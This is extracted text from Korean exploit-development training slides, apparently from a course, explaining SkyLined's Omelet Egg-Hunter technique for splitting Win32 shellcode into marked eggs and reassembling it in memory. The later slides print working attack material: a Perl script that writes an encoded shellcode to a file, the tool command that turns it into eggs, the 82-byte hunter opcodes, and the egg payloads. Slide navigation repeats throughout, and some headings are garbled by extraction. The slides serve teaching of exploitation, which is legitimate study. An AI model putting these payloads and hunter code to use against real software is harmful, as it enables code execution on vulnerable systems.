Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
38. What is the Omelet-Egg-Hunter ?
쉘코드 단편화 기술(shellcode fragmentation technique)
Skylined(Berend-Jan Wever)에 의해 소개됨
(http://code.google.com/p/w32-seh-omelet-shellcode/)
공격가능한 벡터가 아주 작은 크기의 Buffer 만을 제공하며, 공격자가 제
어 가능한 작은 공간의 여러 메모리 조각뿐일때 유용
기본 개념은 일반적인 Egg-Hunter와 같으나, 아래와 같은 차이점이 존재
최종 쉘코드가 여러 조각으로 나누어진다(여러개의 에그)
최종 쉘코드가 실행되기 전에 재조합 된다(발견된 즉시 실행되지 않음)
일반적인 에그 헌터보다 크기가 더 크다(about 90bytes)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
39. Track3. Exploitation How to work Omelet-Egg-Hunter ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
오리지널 쉘 코드 단편화 구성
Length of the Egg
Index Number
3bytes Marker
Fragmented ShellCode (1/n , 2/n, 3/n … n/n)
Omelet-Egg-Hunter 코드
메모리 검색 (search through memory)
모든 에그 찾기(look for all egg)
단편화된 쉘코드를 최종 쉘코드로 조립 (reproduces the original shellcode at the bottom of the stack)
조립된 최종 쉘코드로 이동/실행 (jumps to the reproduced shell code and executes it)
40. Track3. Exploitation How to work Omelet-Egg-Hunter ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Fragmented Shellcode 1/3
Length(32) Index(01) Marker
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
Original Shellcode
Fragmented Shellcode 2/3
Length(32) Index(02) Marker
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3
Length(32) Index(03) Marker
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x30x41x42x41x41x42x54x41
Omelet-Egg-Hunter Code
메모리 검색
Marker 찾기
단편화된 쉘코드 조립
최종 쉘코드로 이동 및 실행
41. Track3. Exploitation How to work Omelet-Egg-Hunter ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Omelet-Egg-Hunter Code
메모리 검색
Marker 찾기
단편화된 쉘코드 조립
최종 쉘코드로 이동 및 실행
Search though memory
Fragmented Shellcode 1/3
Length(32) Index(01) Marker
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
Original Shellcode
Fragmented Shellcode 2/3
Length(32) Index(02) Marker
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3
Length(32) Index(03) Marker
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x30x41x42x41x41x42x54x41
!
42. Track3. Exploitation How to work Omelet-Egg-Hunter ?
Omelet-Egg-Hunter Code
메모리 검색
Marker 찾기
단편화된 쉘코드 조립
최종 쉘코드로 이동 및 실행
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Fragmented Shellcode 1/3
Length(32) Index(01) Marker
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
Original Shellcode
Fragmented Shellcode 2/3
Length(32) Index(02) Marker
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3
Length(32) Index(03) Marker
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x30x41x42x41x41x42x54x41
"
Find Marker
43. Track3. Exploitation How to work Omelet-Egg-Hunter ?
Omelet-Egg-Hunter Code
메모리 검색
Marker 찾기
단편화된 쉘코드 조립
최종 쉘코드로 이동 및 실행
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Fragmented Shellcode 1/3
Length(32) Index(01) Marker
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
Original Shellcode
Fragmented Shellcode 2/3
Length(32) Index(02) Marker
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3
Length(32) Index(03) Marker
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x30x41x42x41x41x42x54x41
#
Check length/index
44. Track3. Exploitation How to work Omelet-Egg-Hunter ?
Omelet-Egg-Hunter Code
메모리 검색
Marker 찾기
단편화된 쉘코드 조립
최종 쉘코드로 이동 및 실행
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Fragmented Shellcode 1/3
Length(32) Index(01) Marker
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
Original Shellcode
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
Fragmented Shellcode 2/3
Length(32) Index(02) Marker
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3
Length(32) Index(03) Marker
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x30x41x42x41x41x42x54x41
#
reproduces the original shellcode at the bottom of the stack
45. Track3. Exploitation How to work Omelet-Egg-Hunter ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Omelet-Egg-Hunter Code
메모리 검색
Marker 찾기
단편화된 쉘코드 조립
최종 쉘코드로 이동 및 실행
Search though memory
Fragmented Shellcode 1/3
Length(32) Index(01) Marker
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
Original Shellcode
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
Fragmented Shellcode 2/3
Length(32) Index(02) Marker
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3
Length(32) Index(03) Marker
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x30x41x42x41x41x42x54x41
$
46. Track3. Exploitation How to work Omelet-Egg-Hunter ?
Omelet-Egg-Hunter Code
메모리 검색
Marker 찾기
단편화된 쉘코드 조립
최종 쉘코드로 이동 및 실행
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Fragmented Shellcode 1/3
Length(32) Index(01) Marker
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
Original Shellcode
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
Fragmented Shellcode 2/3
Length(32) Index(02) Marker
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3
Length(32) Index(03) Marker
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x30x41x42x41x41x42x54x41
%
Find Marker
47. Track3. Exploitation How to work Omelet-Egg-Hunter ?
Omelet-Egg-Hunter Code
메모리 검색
Marker 찾기
단편화된 쉘코드 조립
최종 쉘코드로 이동 및 실행
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Fragmented Shellcode 1/3
Length(32) Index(01) Marker
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
Original Shellcode
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
Fragmented Shellcode 2/3
Length(32) Index(02) Marker
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3
Length(32) Index(03) Marker
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x30x41x42x41x41x42x54x41
&
Check length/index
48. Track3. Exploitation How to work Omelet-Egg-Hunter ?
Omelet-Egg-Hunter Code
메모리 검색
Marker 찾기
단편화된 쉘코드 조립
최종 쉘코드로 이동 및 실행
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Fragmented Shellcode 1/3
Length(32) Index(01) Marker
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
Original Shellcode
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
Fragmented Shellcode 2/3
Length(32) Index(02) Marker
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3
Length(32) Index(03) Marker
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x30x41x42x41x41x42x54x41
&
reproduces the original shellcode at the bottom of the stack
49. Track3. Exploitation How to work Omelet-Egg-Hunter ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Omelet-Egg-Hunter Code
메모리 검색
Marker 찾기
단편화된 쉘코드 조립
최종 쉘코드로 이동 및 실행
Search though memory
Fragmented Shellcode 1/3
Length(32) Index(01) Marker
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
Original Shellcode
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
Fragmented Shellcode 2/3
Length(32) Index(02) Marker
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3
Length(32) Index(03) Marker
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x30x41x42x41x41x42x54x41
'
50. Track3. Exploitation How to work Omelet-Egg-Hunter ?
Omelet-Egg-Hunter Code
메모리 검색
Marker 찾기
단편화된 쉘코드 조립
최종 쉘코드로 이동 및 실행
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Fragmented Shellcode 1/3
Length(32) Index(01) Marker
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
Original Shellcode
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
Fragmented Shellcode 2/3
Length(32) Index(02) Marker
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3
Length(32) Index(03) Marker
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x30x41x42x41x41x42x54x41
(
Find Marker
51. Track3. Exploitation How to work Omelet-Egg-Hunter ?
Omelet-Egg-Hunter Code
메모리 검색
Marker 찾기
단편화된 쉘코드 조립
최종 쉘코드로 이동 및 실행
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Fragmented Shellcode 1/3
Length(32) Index(01) Marker
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
Original Shellcode
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
Fragmented Shellcode 2/3
Length(32) Index(02) Marker
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3
Length(32) Index(03) Marker
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x30x41x42x41x41x42x54x41
)
Check length/index
52. Track3. Exploitation How to work Omelet-Egg-Hunter ?
Fragmented Shellcode 2/3
Length(32) Index(02) Marker
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x30x41x33x48x48x30x41x30
Omelet-Egg-Hunter Code
메모리 검색
Marker 찾기
단편화된 쉘코드 조립
최종 쉘코드로 이동 및 실행
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Fragmented Shellcode 1/3
Length(32) Index(01) Marker
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
Original Shellcode
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x4fx4cx4bx50x4fx42x38x4c
Fragmented Shellcode 3/3
Length(32) Index(03) Marker
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x30x41x42x41x41x42x54x41
)
reproduces the original shellcode at the bottom of the stack
53. Track3. Exploitation How to work Omelet-Egg-Hunter ?
Omelet-Egg-Hunter Code
메모리 검색
Marker 찾기
단편화된 쉘코드 조립
최종 쉘코드로 이동 및 실행
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Fragmented Shellcode 1/3
Length(32) Index(01) Marker
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
Original Shellcode
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x4fx4cx4bx50x4fx42x38x4c
Fragmented Shellcode 2/3
Length(32) Index(02) Marker
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3
Length(32) Index(03) Marker
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x30x41x42x41x41x42x54x41
jumps to the reproduced shellcode and executes it
54. Track3. Exploitation How to made Omelet-Egg-Hunter ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
55. Track3. Exploitation How to made Omelet-Egg-Hunter ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
오믈렛 코드 패키지 다운로드(쉘코드 단편화 및 오믈렛 코드 생성 스크립트)
W32-seh-omelet-shellcode (by Skylined)
https://code.google.com/p/w32-seh-omelet-shellcode/downloads/list
56. Track3. Exploitation How to made Omelet-Egg-Hunter ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
쉘코드 파일 생성 (makingShellCodeForOmelet.pl)
my $scfile="shellcode.bin";
my $shellcode="x89xe2xdaxc1xd9x72xf4x58x50x59x49x49x49x49" .
"x43x43x43x43x43x43x51x5ax56x54x58x33x30x56" .
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41" .
"x42x41x41x42x54x41x41x51x32x41x42x32x42x42" .
"x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a" .
"x48x50x44x43x30x43x30x45x50x4cx4bx47x35x47" .
"x4cx4cx4bx43x4cx43x35x43x48x45x51x4ax4fx4c" .
"x4bx50x4fx42x38x4cx4bx51x4fx47x50x43x31x4a" .
"x4bx51x59x4cx4bx46x54x4cx4bx43x31x4ax4ex50" .
"x31x49x50x4cx59x4ex4cx4cx44x49x50x43x44x43" .
"x37x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4a" .
"x54x47x4bx51x44x46x44x43x34x42x55x4bx55x4c" .
"x4bx51x4fx51x34x45x51x4ax4bx42x46x4cx4bx44" .
"x4cx50x4bx4cx4bx51x4fx45x4cx45x51x4ax4bx4c" .
"x4bx45x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx47" .
"x54x43x34x48x43x51x4fx46x51x4bx46x43x50x50" .
"x56x45x34x4cx4bx47x36x50x30x4cx4bx51x50x44" .
"x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx45x38x43" .
"x38x4bx39x4ax58x4cx43x49x50x42x4ax50x50x42" .
"x48x4cx30x4dx5ax43x34x51x4fx45x38x4ax38x4b" .
"x4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43x45" .
"x31x42x4cx42x43x45x50x41x41";
open(FILE,">$scfile");
print FILE $shellcode;
close(FILE);
print "Wrote ".length($shellcode)." bytes to file ".$scfile."n";
57. Track3. Exploitation How to made Omelet-Egg-Hunter ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
쉘코드를 에그로 변환
하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes
Marker = 0xBADA55
C:Documents and SettingseduDesktopexamplesTrack33EggHuntingToolsForEggHun
tingw32 SEH omelet shellcode v0>w32_SEH_omelet.py
Syntax:
w32_SEH_omelet.py "omelet bin file" "shellcode bin file" "output txt file"
[egg size] [marker bytes]
Where:
omelet bin file = The omelet shellcode stage binary code followed by three
bytes of the offsets of the "marker bytes", "max index"
and "egg size" variables in the code.
shellcode bin file = The shellcode binary code you want to have stored in
the eggs and reconstructed by the omelet shellcode stage
code.
output txt file = The file you want the omelet egg-hunt code and the eggs
to be written to (in text format).
egg size = The size of each egg (legal values: 6-127, default: 127)
marker bytes = The value you want to use as a marker to distinguish the
eggs from other data in user-land address space (legal
values: 0-0xFFFFFF, default value: 0x280876)
Convert the shell code to eggs
C:Documents and SettingseduDesktopexamplesTrack33EggHuntingToolsForEggHun
tingw32 SEH omelet shellcode v0>w32_SEH_omelet.py w32_SEH_omelet.bin shellcode.
bin calceggs.txt 127 0xBADA55
58. Track3. Exploitation How to made Omelet-Egg-Hunter ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
쉘코드를 에그로 변환
하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes
Marker = 0xBADA55
// This is the binary code that needs to be executed to find the eggs,
// recombine the orignal shellcode and execute it. It is 82 bytes:
omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0C
x59xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5A
xE8xC7xFFxFFxFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x03x97xEBxDBx31xC0x64xFFx50x08";
// These are the eggs that need to be injected into the target process
// for the omelet shellcode to be able to recreate the original shellcode
// (you can insert them as many times as you want, as long as each one is
// inserted at least once). They are 127 bytes each:
egg0 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50x59x49x49x49x49x43x43x43x43x43x43x51x5A
x56x54x58x33x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42x54x41x41x51x32x41x4
2x32x42x42x30x42x42x58x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30x45x50x4Cx4B
x47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4F
x47x50x43x31x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43";
egg1 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5A
x44x4Dx43x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55x4Bx55x4Cx4Bx51x4F
x51x34x45x51x4Ax4Bx42x46x4Cx4Bx44x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4Cx4Cx4B
x45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4B
x47x36x50x30x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45";
egg2 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38x4Bx39x4Ax58x4Cx43x49x50x42x4A
x50x50x42x48x4Cx30x4Dx5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37x4Bx4Fx4D
x37x42x43x45x31x42x4C
x42x43x45x50x41x41x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x4
